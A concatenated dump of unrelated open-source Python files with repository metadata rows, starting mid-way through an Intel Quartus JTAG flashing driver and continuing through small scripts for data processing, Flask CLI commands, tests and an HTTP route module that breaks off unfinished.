    :param dict jtagconfig: (optional) jtagconfig --setparam commands
      to run before starting.
      These are expanded with the target keywords with
      *%(FIELD)s* templates, with fields being the target's
      :ref:`metadata <finding_testcase_metadata>` and then run as::
        jtagconfig --setparam CABLENAME KEY VALUE
    :param int tcp_port: (optional, default *None*) if a TCP port
      number is given, it is a assumed the flashing server is in
      localhost in the given TCP port.
    :param str sibling_serial_number (optional, default *None*) USB serial
      number of the USB device that is a sibling to the one defined by
      usb_serial_number
    :param int usb_port (optional, default *None*) port that the USB device is
      connected to, used in combination with sibling_serial_number to find
      the USB path for devices that do not have unique serial numbers (USB
      Blaster I)
    Other parameters described in :class:ttbl.images.impl_c.
    **Command line reference**
    https://www.intel.com/content/dam/www/programmable/us/en/pdfs/literature/manual/tclscriptrefmnl.pdf
    Section Quartus_PGM (2-50)
    **System setup**
    - Download and install Quartus Programmer::
        $ wget http://download.altera.com/akdlm/software/acdsinst/20.1std/711/ib_installers/QuartusProgrammerSetup-20.1.0.711-linux.run
        # chmod a+x QuartusProgrammerSetup-20.1.0.711-linux.run
        # ./QuartusProgrammerSetup-20.1.0.711-linux.run --unattendedmodeui none --mode unattended --installdir /opt/quartus --accept_eula 1
    - if installing to a different location than */opt/quartus*,
      adjust the value of :data:`path` in a FIXME:ttbd configuration
      file.
    **Troubleshooting**
    When it fails to flash, the error log is reported in the server in
    a file called *flash-COMPONENTS.log* in the target's state
    directory (FIXME: we need a better way for this--the admin shall
    be able to read it, but not the users as it might leak sensitive
    information?).
    Common error messages:
    - *Error (213019): Can't scan JTAG chain. Error code 87*
      Also seen when manually running in the server::
        $ /opt/quartus/qprogrammer/bin/jtagconfig
        1) USB-BlasterII [3-1.4.4.3]
        Unable to read device chain - JTAG chain broken
      In many cases this has been:
      - a powered off main board: power it on
      - a misconnected USB-BlasterII: reconnect properly
      - a broken USB-BlasterII: replace unit
    - *Error (209012): Operation failed*
      this usually happens when flashing one component of a multiple
      component chain; the log might read something like::
        Info (209060): Started Programmer operation at Mon Jul 20 12:05:22 2020
        Info (209017): Device 2 contains JTAG ID code 0x038301DD
        Info (209060): Started Programmer operation at Mon Jul 20 12:05:22 2020
        Info (209016): Configuring device index 2
        Info (209017): Device 2 contains JTAG ID code 0x018303DD
        Info (209007): Configuration succeeded -- 1 device(s) configured
        Info (209011): Successfully performed operation(s)
        Info (209061): Ended Programmer operation at Mon Jul 20 12:05:22 2020
        Error (209012): Operation failed
        Info (209061): Ended Programmer operation at Mon Jul 20 12:05:22 2020
        Error: Quartus Prime Programmer was unsuccessful. 1 error, 0 warnings
      This case has been found to be because the **--bgp** option is
      needed (which seems to map to the *Enable Realtime ISP
      programming* in the Quartus UI, *quartus_pgmw*)
    - *Warning (16328): The real-time ISP option for Max 10 is
      selected. Ensure all Max 10 devices being programmed are in user
      mode when requesting this programming option*
      Followed by:
      *Error (209012): Operation failed*
      This case comes when a previous flashing process was interrupted
      half way or the target is corrupted.
      It needs a special one-time recovery; currently the
      workaround seems to run the flashing with out the *--bgp* switch
      that as of now is hardcoded.
      FIXME: move the --bgp and --mode=JTAG switches to the args (vs
      hardcoded) so a recovery target can be implemented as
      NAME-nobgp
    *Using Quartus tool with a remote jtagd*
    The service port for *jtagd* can be tunneled in and used by the
    Quartus toolsuite::
      $ tcf property-get r013s001 interfaces.power.jtagd.tcp_port
      5337
      $ tcf power-on -c jtagd TARGET
      $ tcf tunnel-add TARGET 5337 tcp 127.0.01
      SERVERNAME:1234
    Now the Quartus Qprogrammer tools need to be told which server to
    add::
      $ jtagdconfig --addserver SERVERNAME:1234 ""
    (second entry is an empty password); this adds an entry to
    *~/.jtagd.conf*::
      # /home/USERNAME/.jtag.conf
      Remote1 {
              Host = "SERVERNAME:1234";
              Password = "";
      }
    Note the port number changes with each tunnel, you will have to
    *jtagconfig --addserver* and delete the old one (you can edit the
    file by hand too).
    Now list remote targets::
      $ jtagconfig
      1) USB-BlasterII on SERVERNAME:1234 [3-1.4.1]
        031050DD   10M50DA(.|ES)/10M50DC
        031040DD   10M25D(A|C)
    Note this connection is open to anyone until the tunnel is removed
    or the allocation is released with *tcf alloc-rm* or
    equivalent. *PENDING* use SSL to secure access.
    [ see also for the Quartus GUI, follow
    https://www.intel.com/content/www/us/en/programmable/quartushelp/13.0/mergedProjects/program/pgm/pgm_pro_add_server.htm ]
    **Quartus Lite**
    Download from https://www.intel.com/content/www/us/en/software-kit/684215/intel-quartus-prime-lite-edition-design-software-version-21-1-for-linux.html?
    Install with::
      $ tar xf Quartus-lite-21.1.0.842-linux.tar
      $ cd components
      $ chmod a+x ./Quartus-lite-21.1.0.842-linux.tar
      $ ./Quartus-lite-21.1.0.842-linux.tar
    Quartus will use the same *~/.jtagd.conf* if you have used
    *jtagconfig* to configure as above
    1. Start Quartus::
       $ INSTALLPATH/intelFPGA_lite/21.1/quartus/bin/quartus
    2. Go to Programmer > Edit > Hardware Setup
    3. Click on *Add Hardware*
    4. Enter as *Server Name* and *Server Port* the name of the server
       that is doing the tunnel (as printed by *tcf tunnel-add*
       above); leave the password blank.
    5. Click *OK*
    **Troubleshooting**
    - can't connect to port::
        $ ./jtagconfig
        1) Remote server SERVERNAME:1234: Unable to connect
      - ensure jtagd in the target is on
      - ensure the tunnel is on
    """
    #: Path to *quartus_pgm*
    #:
    #: We need to use an ABSOLUTE PATH if the tool is not in the
    #: normal search path (which usually won't).
    #:
    #: Change by setting, in a :ref:`server configuration file
    #: <ttbd_configuration>`:
    #:
    #: >>> ttbl.quartus.pgm_c.path = "/opt/quartus/qprogrammer/bin/quartus_pgm"
    #:
    #: or for a single instance that then will be added to config:
    #:
    #: >>> imager = ttbl.quartus.pgm_c(...)
    #: >>> imager.path = "/opt/quartus/qprogrammer/bin/quartus_pgm"
    path = "/opt/quartus/qprogrammer/bin/quartus_pgm"
    #: Path to *jtagconfig*, used to run per-cable --setparam commands
    path_jtagconfig = "/opt/quartus/qprogrammer/bin/jtagconfig"
    def __init__(self, usb_serial_number, image_map, args = None, name = None,
                 jtagconfig = None, tcp_port = None,
                 sibling_serial_number = None, usb_port = None,
                 **kwargs):
        # Validate arguments early so config errors surface at server start
        assert isinstance(usb_serial_number, str)
        commonl.assert_dict_of_ints(image_map, "image_map")
        commonl.assert_none_or_dict_of_strings(jtagconfig, "jtagconfig")
        assert name == None or isinstance(name, str)
        assert tcp_port == None or isinstance(tcp_port, int)
        self.usb_serial_number = usb_serial_number
        self.tcp_port = tcp_port
        self.image_map = image_map
        self.jtagconfig = jtagconfig
        self.sibling_serial_number = sibling_serial_number
        self.usb_port = usb_port
        if args:
            commonl.assert_dict_of_strings(args, "args")
            self.args = args
        else:
            self.args = {}
        # Base command line; stdbuf disables buffering so the log file
        # reflects progress in real time.
        cmdline = [
            "stdbuf", "-o0", "-e0", "-i0",
            self.path,
            # FIXME: move this to args, enable value-less args (None)
            "--bgp", # Real time background programming
            "--mode=JTAG", # this is a JTAG
            # when using a server, if the target is called
            # SOMETHING in SERVERNAME:PORT CABLENAME, it seems PGM
            # goes straight there. Weird
            "-c", "%(device_path)s", # will resolve in flash_start()
            # in flash_start() call we'll map the image names to targets
            # to add these
            #
            #'--operation=PVB;%(image.NAME)s@1',
            #'--operation=PVB;%(image.NAME)s@2',
            #...
            # (P)rogram (V)erify, (B)lank-check
            #
            # note like this we can support burning multiple images into the
            # same chain with a single call
        ]
        if args:
            for arg, value in args.items():
                if value != None:
                    cmdline += [ arg, value ]
        # we do this because in flash_start() we need to add
        # --operation as we find images we are supposed to flash
        self.cmdline_orig = cmdline
        ttbl.images.flash_shell_cmd_c.__init__(self, cmdline, cwd = '%(file_path)s',
                                               **kwargs)
        if name == None:
            self.name = "quartus"
        self.upid_set(
            f"Intel Quartus PGM @ USB#{usb_serial_number}",
            usb_serial_number = usb_serial_number)
    def flash_start(self, target, images, context):
        """Finish building the quartus_pgm command line for *images* and start it."""
        # Finalize preparing the command line for flashing the images
        # find the device path; quartus_pgm doesn't seem to be able to
        # address by serial and expects a cable name as 'PRODUCT NAME
        # [PATH]', like 'USB BlasterII [1-3.3]'; we can't do this on
        # object creation because the USB path might change when we power
        # it on/off (rare, but could happen). Since USB Blaster I do not
        # have unique serial numbers we use a combination of usb_port
        # and sibling_serial_number to find the correct usb_path
        if self.usb_port != None:
            usb_path, _vendor, product = ttbl.usb_serial_to_path(
                self.sibling_serial_number, self.usb_port)
        else:
            usb_path, _vendor, product = ttbl.usb_serial_to_path(
                self.usb_serial_number)
        if self.tcp_port:
            # server based cable name
            device_path = f"{product} on localhost:{self.tcp_port} [{usb_path}]"
            jtag_config_filename = f"{target.state_dir}/jtag-{'_'.join(images.keys())}.conf"
            # Create the jtag client config file to ensure that
            # the correct jtag daemon is connected to, then use the
            # environment variable QUARTUS_JTAG_CLIENT_CONFIG to have
            # the quartus software find it
            with open(jtag_config_filename, "w+") as jtag_config:
                jtag_config.write(
                    f'ReplaceLocalJtagServer = "localhost:{self.tcp_port}";')
            self.env_add["QUARTUS_JTAG_CLIENT_CONFIG"] = jtag_config_filename
        else:
            # local cable name, starts sever on its own
            device_path = f"{product} [{usb_path}]"
        context['kws'] = {
            # HACK: we assume all images are in the same directory, so
            # we are going to cwd there (see in __init__ how we set
            # cwd to %(file_path)s. Reason is some of our paths might
            # include @, which the tool considers illegal as it uses
            # it to separate arguments--see below --operation
            'file_path': os.path.dirname(list(images.values())[0]),
            'device_path': device_path,
            # flash_shell_cmd_c.flash_start() will add others
        }
        # for each image we are burning, map it to a target name in
        # the cable (@NUMBER)
        # make sure we don't modify the originals
        cmdline = copy.deepcopy(self.cmdline_orig)
        for image_type, filename in images.items():
            target_index = self.image_map.get(image_type, None)
            # pass only the realtive filename, as we are going to
            # change working dir into the path (see above in
            # context[kws][file_path]
            cmdline.append("--operation=PVB;%s@%d" % (
                os.path.basename(filename), target_index))
        # now set it for flash_shell_cmd_c.flash_start()
        self.cmdline = cmdline
        if self.jtagconfig:
            # Run the configured 'jtagconfig --setparam' commands before
            # flashing; NOTE(review): this builds a localhost:{tcp_port}
            # server address even when tcp_port is None -- confirm
            # jtagconfig is only configured together with tcp_port.
            for option, value in self.jtagconfig.items():
                cmdline = [
                    self.path_jtagconfig,
                    "--addserver", f"localhost:{self.tcp_port}", "", # empty password
                    "--setparam",
                    device_path,
                    option, value
                ]
                target.log.info("running per-config: %s" % " ".join(cmdline))
                subprocess.check_output(
                    cmdline, shell = False, stderr = subprocess.STDOUT)
        ttbl.images.flash_shell_cmd_c.flash_start(self, target, images, context)
class jtagd_c(ttbl.power.daemon_c):
    """Driver for the jtag daemon
    This driver starts the jtag daemon on the server for a specific
    USB Blaster II
    Does not override any of the default methods except for verify
    **Arugments**
    :param str usb_serial_number: serial number of the USB Blaster II
    :param int tcp_port: (1024 - 65536) Number of the TCP port on
      localhost where the daemon will listen
    :param str jtagd_path: (optional) orverride :data:`jtagd_path`;
    :param str check_path: (optional) path of the running daemon binary
      used to verify the process is alive; defaults to the renamed
      *linux64/jtagd* binary (see note in the constructor).
    :param str explicit: (optional; default *off*) control when this
      is started on/off:
      - *None*: for normal behaviour; component will be
        powered-on/started with the whole power rail
      - *both*: explicit for both powering on and off: only
        power-on/start and power-off/stop if explicity called by
        name
      - *on*: explicit for powering on: only power-on/start if explicity
        powered on by name, power off normally
      - *off*: explicit for powering off: only power-off/stop if explicity
        powered off by name, power on normally
      By default it is set to *off*, so that when the target is powere
      off existing network connections to the daemon are maintained.
    Any other arguments as taken by :class:ttbl.power.daemon_c and
    :class:ttbl.power.impl_c.
    """
    #: Default path to the *jtagd* binary; can be overriden per-instance
    #: with the *jtagd_path* constructor argument or globally here.
    jtagd_path = "/opt/quartus/qprogrammer/bin/jtagd"
    def __init__(self, usb_serial_number, tcp_port, jtagd_path = None,
                 check_path = None, explicit = "off", **kwargs):
        assert isinstance(usb_serial_number, str), \
            "usb_serial_number: expected a string, got %s" % type(usb_serial_number)
        # BUGFIX: report tcp_port's type (the original message reported
        # usb_serial_number's type, hiding the actual offender)
        assert isinstance(tcp_port, int), \
            "tcp_port: expected an integer between 1024 and 65536, got %s" \
            % type(tcp_port)
        if jtagd_path:
            self.jtagd_path = jtagd_path
        # BUGFIX: the message named 'openipc_path' (copy/paste leftover)
        # and reported type(jtagd_path), which can be NoneType even when
        # the offending value is the class attribute
        assert isinstance(self.jtagd_path, str), \
            "jtagd_path: expected a string, got %s" % type(self.jtagd_path)
        self.usb_serial_number = usb_serial_number
        self.tcp_port = tcp_port
        cmdline = [
            self.jtagd_path,
            "--no-config",
            "--auto-detect-filter", usb_serial_number,
            "--port", str(tcp_port),
            "--debug",
            "--foreground",
        ]
        if check_path == None:
            # ...linux64/jtagd renames itself to jtagd and it makes it hard to kill
            check_path = "/opt/quartus/qprogrammer/linux64/jtagd"
        ttbl.power.daemon_c.__init__(
            self, cmdline, precheck_wait = 0.5, mkpidfile = True,
            name = "jtagd", explicit = explicit,
            path = "jtagd",
            # BUGFIX: honor the check_path argument; it was accepted by
            # the signature but silently ignored (always hardcoded)
            check_path = check_path,
            **kwargs)
        # Register the instrument like this, so it matches pgm_c and
        # others and they all point to the same instrument
        self.upid_set(
            f"Intel Quartus PGM @ USB#{usb_serial_number}",
            usb_serial_number = usb_serial_number)
    def target_setup(self, target, iface_name, component):
        """Publish the daemon's TCP port and allow tunneling to it."""
        target.fsdb.set(f"interfaces.{iface_name}.{component}.tcp_port",
                        self.tcp_port)
        # Set the local ports that is able to be reached via tunneling
        target.tunnel.allowed_local_ports.add(("127.0.0.1", "tcp",
                                               self.tcp_port))
        ttbl.power.daemon_c.target_setup(self, target, iface_name, component)
    def verify(self, target, component, cmdline_expanded):
        """Daemon is up if its PID is alive and its TCP port is bound."""
        pidfile = os.path.join(target.state_dir, component + "-jtagd.pid")
        return commonl.process_alive(pidfile, self.check_path) \
            and commonl.tcp_port_busy(self.tcp_port)
    def on(self, target, component):
        # plain pass-through to the base implementation; kept explicit
        return ttbl.power.daemon_c.on(self, target, component)
| 37.899194 | 155 | 0.641132 | 18,584 | 0.988616 | 0 | 0 | 0 | 0 | 0 | 0 | 13,224 | 0.703479 |
2bdc74e67c215c83e64d2416221be3804da9d5cb | 883 | py | Python | files/carinha.py | joaovpassos/USP-Programs | 09ddb8aed238df1f1a2e80afdc202ac4538daf41 | [
"MIT"
] | 2 | 2021-05-26T19:14:16.000Z | 2021-05-27T21:14:24.000Z | files/carinha.py | joaovpassos/USP-Programs | 09ddb8aed238df1f1a2e80afdc202ac4538daf41 | [
"MIT"
] | null | null | null | files/carinha.py | joaovpassos/USP-Programs | 09ddb8aed238df1f1a2e80afdc202ac4538daf41 | [
"MIT"
] | null | null | null | x = float(input("Digite x: "))
y = float(input("Digite y: "))
# Classify the point (x, y) on an 8x8 grid: print "branco" (white) if it
# falls on a feature of the face drawing (or outside the head region),
# "azul" (blue) for the face background.
if 0 <= x <= 8 and 0 <= y <= 8:
    if (0 <= x < 1 or 7 < x <= 8) and (0 <= y < 2): # neck
        print("branco")
    elif 3.5 <= x <= 4.5 and 3.5 <= y <= 4.5: # nose
        print("branco")
    elif (1 <= x <= 3 or 5 <= x <= 7) and (7.25 <= y <= 7.75): # eyebrows
        print("branco")
    elif (((x-2)**2 + (y-6)**2 <= 1**2) and not ((x-2)**2 + (y-6)**2 <= 0.5**2)): # left eye (ring)
        print("branco")
    elif (((x-6)**2 + (y-6)**2 <= 1**2) and not ((x-6)**2 + (y-6)**2 <= 0.5**2)): # right eye (ring)
        print("branco")
    elif 3 < x < 5 and 1.5 < y < 2.5: # mouth
        print("branco")
    elif ((x-3)**2 + (y-2)**2 < 0.5**2): # left mouth corner
        print("branco")
    elif ((x-5)**2 + (y-2)**2 < 0.5**2): # right mouth corner
        print("branco")
    else:
        print("azul")
else:
    print("branco")
| 35.32 | 96 | 0.437146 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 188 | 0.21267 |
2bdcbb9196f7ddd57e7b4ad584ef8f3fd81fbbd6 | 565 | py | Python | delivery/delivery/exts/cli/__init__.py | all0cer/flask | a72bee18fd8d4ccf0f16e0e637f7e0b1779e7d85 | [
"Unlicense"
] | null | null | null | delivery/delivery/exts/cli/__init__.py | all0cer/flask | a72bee18fd8d4ccf0f16e0e637f7e0b1779e7d85 | [
"Unlicense"
] | null | null | null | delivery/delivery/exts/cli/__init__.py | all0cer/flask | a72bee18fd8d4ccf0f16e0e637f7e0b1779e7d85 | [
"Unlicense"
] | null | null | null | from enum import Flag
import click
from delivery.exts.db import db
from delivery.exts.db import models
def init_app(app):
    """Register the delivery CLI commands on the Flask *app*.

    Adds two commands to the app's CLI:

    - ``create-db``: create all database tables;
    - ``add-new-user``: insert a user with the given e-mail, password
      and optional admin flag.
    """
    @app.cli.command()
    def create_db():
        """Create all database tables."""
        db.create_all()
    @app.cli.command()
    @click.option("--email", "-e")
    @click.option("--passwd", "-p")
    @click.option("--admin", "-a", is_flag=True, default=False)
    def add_new_user(email, passwd, admin):
        """Add a new user and commit it to the database."""
        # BUGFIX: the original referenced a bare `User` name that is never
        # imported (NameError at runtime); the model is reached through the
        # `models` module imported above (assumes models.User exists --
        # TODO confirm against delivery.exts.db.models).
        user = models.User(
            email=email,
            passwd=passwd,
            admin=admin
        )
        db.session.add(user)
        db.session.commit()
2bdcd33401ff8240d2bd02c4fb44f1db772552fb | 1,587 | py | Python | main.py | maxBombrun/lipidDroplets | d624b718a7f70c45c1058938d916b78aa14390a7 | [
"BSD-3-Clause"
] | null | null | null | main.py | maxBombrun/lipidDroplets | d624b718a7f70c45c1058938d916b78aa14390a7 | [
"BSD-3-Clause"
] | null | null | null | main.py | maxBombrun/lipidDroplets | d624b718a7f70c45c1058938d916b78aa14390a7 | [
"BSD-3-Clause"
] | null | null | null | import os
import csv
import multiprocessing
import settings
import segmentNucAndGFP
import cellProfilerGetRelation
import measureGFPSize
import plotFeatures
import fusionCSV
import clusterDroplets
import computeZprime
# Initialize the shared settings module (populates settings.pathList).
settings.init()
# Unpack the configured paths; the order is fixed by settings.init().
CPPath=settings.pathList[0]
inputDataPath=settings.pathList[1]
resultPath=settings.pathList[2]
outputDetPath=settings.pathList[3]
inputCellProfilerPath=settings.pathList[4]
outputCellProfilerPath=settings.pathList[5]
nProc = multiprocessing.cpu_count()
# Every sub-directory of the input folder named 'plate*' is one plate to process.
listPlates= [x for x in os.listdir(inputDataPath) if os.path.isdir(inputDataPath+x) and x.startswith('plate')]
csv.register_dialect('unixpwd', delimiter=',',quotechar = '"', doublequote = True, skipinitialspace = False,lineterminator = '\n', quoting = csv.QUOTE_NONE)
# NOTE: Python 2 print statement -- this script requires Python 2.x.
print listPlates
## Segmentation of the nuclei and the lipid droplets
segmentNucAndGFP.segmentFatDroplet(listPlates)
## Cells approximation based on the previous segmentation
## and features extraction through CellProfiler
cellProfilerGetRelation.runCellProfilerRelationship()
## Individual lipid droplet measurements
## Creation of size distribution vectors
measureGFPSize.measureGFP()
## Classification of the cells based on the vectors
clusterDroplets.getClusterOfDroplets(nbClass=2)
## Creation of CSV output, summarizing the measurements per-cell and per-well
fusionCSV.getPerImageMeasurements()
## Plotting of the features
plotFeatures.plotFeat()
## Validation of the features through the computation of the Zprime factor
computeZprime.getZprime()
| 27.362069 | 158 | 0.7908 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 500 | 0.31506 |
2bddb9b7282ff011959fc2aa41a6520b2612a723 | 503 | py | Python | test/integration/test_load_shapefile_networkx_native.py | JoachimC/magicbox_distance | 3706172315f406a391bb643d494dad121b858e97 | [
"BSD-3-Clause"
] | null | null | null | test/integration/test_load_shapefile_networkx_native.py | JoachimC/magicbox_distance | 3706172315f406a391bb643d494dad121b858e97 | [
"BSD-3-Clause"
] | 12 | 2018-08-11T13:26:33.000Z | 2018-10-16T15:36:16.000Z | test/integration/test_load_shapefile_networkx_native.py | JoachimC/magicbox_distance | 3706172315f406a391bb643d494dad121b858e97 | [
"BSD-3-Clause"
] | null | null | null | import unittest
import networkx as nx
class TestLoadColumbiaRoadsNetworkXNative(unittest.TestCase):
    """Smoke test: load the Colombia roads shapefile with networkx's native reader."""
    def test_load(self):
        # https://data.humdata.org/dataset/d8f6feda-6755-4e84-bd14-5c719bc5f37a (hotosm_col_roads_lines_shp.zip)
        # NOTE: hardcoded local path; the test only works on the author's machine.
        roads_file = "/Users/joachim/Downloads/hotosm_col_roads_lines_shp/hotosm_col_roads_lines.shp"
        # todo : ImportError: read_shp requires OGR: http://www.gdal.org/
        G = nx.read_shp(roads_file)
if __name__ == '__main__':
    unittest.main()
| 29.588235 | 112 | 0.739563 | 412 | 0.819085 | 0 | 0 | 0 | 0 | 0 | 0 | 259 | 0.514911 |
2bdeec10badbbad623dc47ed6ce5bac529387aa3 | 2,732 | py | Python | model/Teams_data_prep.py | YWang9999/Fantasy-Premier-League | 906e470fa7514294ccf8dad0591b12fd4f40cb22 | [
"MIT"
] | null | null | null | model/Teams_data_prep.py | YWang9999/Fantasy-Premier-League | 906e470fa7514294ccf8dad0591b12fd4f40cb22 | [
"MIT"
] | null | null | null | model/Teams_data_prep.py | YWang9999/Fantasy-Premier-League | 906e470fa7514294ccf8dad0591b12fd4f40cb22 | [
"MIT"
] | null | null | null | import pandas as pd
from config import WEBSCRAPE_DATA_PATH, OUTPUT_DATA_PATH
import os
def get_understat_filepaths(file_path):
    """Collect the per-team understat CSV paths under *file_path*.

    Walks *file_path* recursively and keeps files whose name contains
    'understat' but neither 'team' nor 'player' (i.e. the per-team match
    files such as ``understat_Manchester_United.csv``).

    :param file_path: directory to search.
    :return: DataFrame indexed by team name (underscores in the file
        name replaced by spaces) with a 'Filepath' column holding the
        full path to that team's CSV.
    """
    filepaths = []
    team = []
    for root, dirs, files in os.walk(file_path):
        for filename in files:
            if ('understat' in filename) and ('team' not in filename) and ('player' not in filename):
                # BUGFIX: include the actual file name in the stored path;
                # the original appended a literal placeholder, so every
                # entry pointed at a non-existent "<root>/(unknown)" path.
                filepaths += [f"{root}/{filename}"]
                # 'understat_Manchester_United.csv' -> 'Manchester United'
                team = team + [filename.split('_', 1)[1].split('.')[0].replace("_", " ")]
    return pd.DataFrame({'Filepath': filepaths,
                         }, index=team)
def create_teams_data(filepath):
    """Build per-season team match data joined with opponent stats.

    Expects *filepath* to contain one sub-directory per season (the
    first four characters of its name being the year), each with an
    'understat' folder of per-team CSVs (see get_understat_filepaths).

    :param filepath: root directory of the scraped data.
    :return: dict mapping season year -> DataFrame of per-match rows
        (date, xG, xGA, xpts, team id/name, games played, season) merged
        with the opposing team's row of the same fixture (columns
        suffixed '_opponent').
    """
    understat_year_df_dict = {}
    understat_year_df_with_opps_dict = {}
    for subdir in os.listdir(filepath):
        # Season year is encoded in the first 4 characters of the folder name.
        year = int(subdir[:4])
        understat_dict = {}
        players_path = os.path.join(os.path.normpath(filepath), subdir)
        understat_paths = get_understat_filepaths(os.path.join(players_path, 'understat'))
        print(understat_paths)
        # Assign sequential 1-based ids to the teams found this season.
        teams_list = pd.DataFrame({'name': understat_paths.index.values})
        teams_list['id'] = teams_list.index + 1
        for team in understat_paths.index:
            understat_dict[team] = pd.read_csv(understat_paths.loc[team, 'Filepath'],
                                               usecols=['date', 'xG', 'xGA', 'xpts'])
            understat_dict[team]['Team'] = team
            understat_dict[team]['date'] = pd.to_datetime(understat_dict[team].date).dt.date
            understat_dict[team].sort_values(['date'], ascending=True, inplace=True)
            # Running match count per team (index is 0-based, so +1).
            understat_dict[team]['Games_played'] = understat_dict[team].index + 1
        understat_year_df_dict[year] = pd.concat(understat_dict.values())
        understat_year_df_dict[year]['season'] = year
        understat_year_with_id = understat_year_df_dict[year].merge(teams_list,
                                                                    left_on='Team',
                                                                    right_on='name').drop('name', axis=1)
        understat_opponents_filtered = understat_year_with_id[['xG', 'xGA', 'xpts', 'Team', 'id']]
        # Self-join to attach the opponent's row: a fixture's two rows have
        # mirrored (xG, xGA) values. NOTE(review): this assumes no two
        # fixtures in a season share the exact same (xG, xGA) pair -- a
        # duplicate pair would produce spurious matches.
        understat_year_df_with_opps_dict[year] = understat_year_with_id.\
            merge(understat_opponents_filtered, left_on=['xG', 'xGA'], right_on=['xGA', 'xG'],
                  suffixes=('', '_opponent'), how='outer').drop(['xG_opponent', 'xGA_opponent'], axis=1)
    return understat_year_df_with_opps_dict
def main():
    """Build the per-season teams data and write it to teams_data.csv."""
    teams_data_dict = create_teams_data(filepath=WEBSCRAPE_DATA_PATH)
    # Stack all seasons into a single frame before writing.
    teams_data_with_understat = pd.concat(teams_data_dict.values())
    teams_data_with_understat.to_csv(os.path.join(OUTPUT_DATA_PATH, 'teams_data.csv'), index=False)
if __name__ == "__main__":
    main()
| 45.533333 | 105 | 0.618594 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 293 | 0.107247 |
2be02c61f025593134bd6a0b8e769bcd4e8919c2 | 3,995 | py | Python | respy/tests/test_parallelism.py | tobiasraabe/respy_for_ma | 405f40851b176705fe924220fba606263d47f3d6 | [
"MIT"
] | null | null | null | respy/tests/test_parallelism.py | tobiasraabe/respy_for_ma | 405f40851b176705fe924220fba606263d47f3d6 | [
"MIT"
] | null | null | null | respy/tests/test_parallelism.py | tobiasraabe/respy_for_ma | 405f40851b176705fe924220fba606263d47f3d6 | [
"MIT"
] | null | null | null | import numpy as np
import pytest
from respy import RespyCls
from respy.python.shared.shared_constants import IS_PARALLELISM_MPI
from respy.python.shared.shared_constants import IS_PARALLELISM_OMP
from respy.tests.codes.auxiliary import compare_est_log
from respy.tests.codes.auxiliary import simulate_observed
from respy.tests.codes.random_model import generate_random_model
@pytest.mark.skipif(
    not IS_PARALLELISM_MPI and not IS_PARALLELISM_OMP, reason="No PARALLELISM available"
)
class TestClass(object):
    """This class groups together some tests."""
    def test_1(self):
        """Ensure that it makes no difference whether the
        criterion function is evaluated in parallel or not.
        """
        # Generate random initialization file
        constr = {
            "program": {"version": "fortran"},
            "estimation": {"maxfun": np.random.randint(0, 50)},
        }
        params_spec, options_spec = generate_random_model(point_constr=constr)
        # If delta is a not fixed, we need to ensure a bound-constraint optimizer.
        # However, this is not the standard flag_estimation as the number of function
        # evaluation is possibly much larger to detect and differences in the updates of
        # the optimizer steps depending on the implementation.
        if params_spec.loc[("delta", "delta"), "fixed"] is False:
            options_spec["estimation"]["optimizer"] = "FORT-BOBYQA"
        base = None
        # Run the same estimation once parallel, once serial; the criterion
        # value must be identical in both cases.
        for is_parallel in [True, False]:
            options_spec["program"]["threads"] = 1
            options_spec["program"]["procs"] = 1
            if is_parallel:
                if IS_PARALLELISM_OMP:
                    options_spec["program"]["threads"] = np.random.randint(2, 5)
                if IS_PARALLELISM_MPI:
                    options_spec["program"]["procs"] = np.random.randint(2, 5)
            respy_obj = RespyCls(params_spec, options_spec)
            respy_obj = simulate_observed(respy_obj)
            _, crit_val = respy_obj.fit()
            # First iteration stores the reference value; later ones must match.
            if base is None:
                base = crit_val
            np.testing.assert_equal(base, crit_val)
    def test_2(self):
        """ This test ensures that the record files are identical.
        """
        # Generate random initialization file. The number of periods is higher than
        # usual as only FORTRAN implementations are used to solve the random request.
        # This ensures that also some cases of interpolation are explored.
        constr = {
            "program": {"version": "fortran"},
            "num_periods": np.random.randint(3, 10),
            "estimation": {"maxfun": 0},
        }
        params_spec, options_spec = generate_random_model(point_constr=constr)
        base_sol_log, base_est_info_log = None, None
        base_est_log = None
        # Run serial first, then parallel; all record files written by the
        # two runs must be byte-identical.
        for is_parallel in [False, True]:
            options_spec["program"]["threads"] = 1
            options_spec["program"]["procs"] = 1
            if is_parallel:
                if IS_PARALLELISM_OMP:
                    options_spec["program"]["threads"] = np.random.randint(2, 5)
                if IS_PARALLELISM_MPI:
                    options_spec["program"]["procs"] = np.random.randint(2, 5)
            respy_obj = RespyCls(params_spec, options_spec)
            file_sim = respy_obj.get_attr("file_sim")
            simulate_observed(respy_obj)
            respy_obj.fit()
            # Check for identical records
            fname = file_sim + ".respy.sol"
            if base_sol_log is None:
                base_sol_log = open(fname, "r").read()
            assert open(fname, "r").read() == base_sol_log
            if base_est_info_log is None:
                base_est_info_log = open("est.respy.info", "r").read()
            assert open("est.respy.info", "r").read() == base_est_info_log
            if base_est_log is None:
                base_est_log = open("est.respy.log", "r").readlines()
            compare_est_log(base_est_log)
2be40f59b3a6beb7eecae2366c58ea92cc8def63 | 2,170 | py | Python | qgis_plutil/http_server/routes.py | pyqgis/plutil | 79df2596e4e0340f3765ccb5bdfd4cc1d01fcb7d | [
"MIT"
] | null | null | null | qgis_plutil/http_server/routes.py | pyqgis/plutil | 79df2596e4e0340f3765ccb5bdfd4cc1d01fcb7d | [
"MIT"
] | null | null | null | qgis_plutil/http_server/routes.py | pyqgis/plutil | 79df2596e4e0340f3765ccb5bdfd4cc1d01fcb7d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
"""
from __future__ import unicode_literals
from __future__ import print_function
import logging
from json import dumps
from flask import request
logger = logging.getLogger('plutil.http.s')
def define_common_routes(plugin, app, server):
    """ Some routes are always defined.

    Registers three routes on *app*:

    - ``/``: echoes the request arguments back (connectivity check);
    - ``/shut_me_down_used_for_restarts``: stops the werkzeug server;
    - ``/result``: pops and returns a queued message result by ``id``.
    """
    @app.route('/', methods=['GET', 'POST'])
    def route_index():
        """Echo the request arguments back as JSON."""
        logger.debug("Server reached on root path")
        the_args = request.args
        for arg in the_args:
            # BUGFIX: pass format arguments separately; the original passed
            # a single tuple to two %s placeholders, which raises a
            # formatting error inside the logging machinery at log time.
            logger.debug(" - argument %s: %s", arg, the_args[arg])
        return dumps({
            'status': 'OK',
            'result': the_args
        })
    @app.route('/shut_me_down_used_for_restarts', methods=['POST'])
    def route_shutdown():
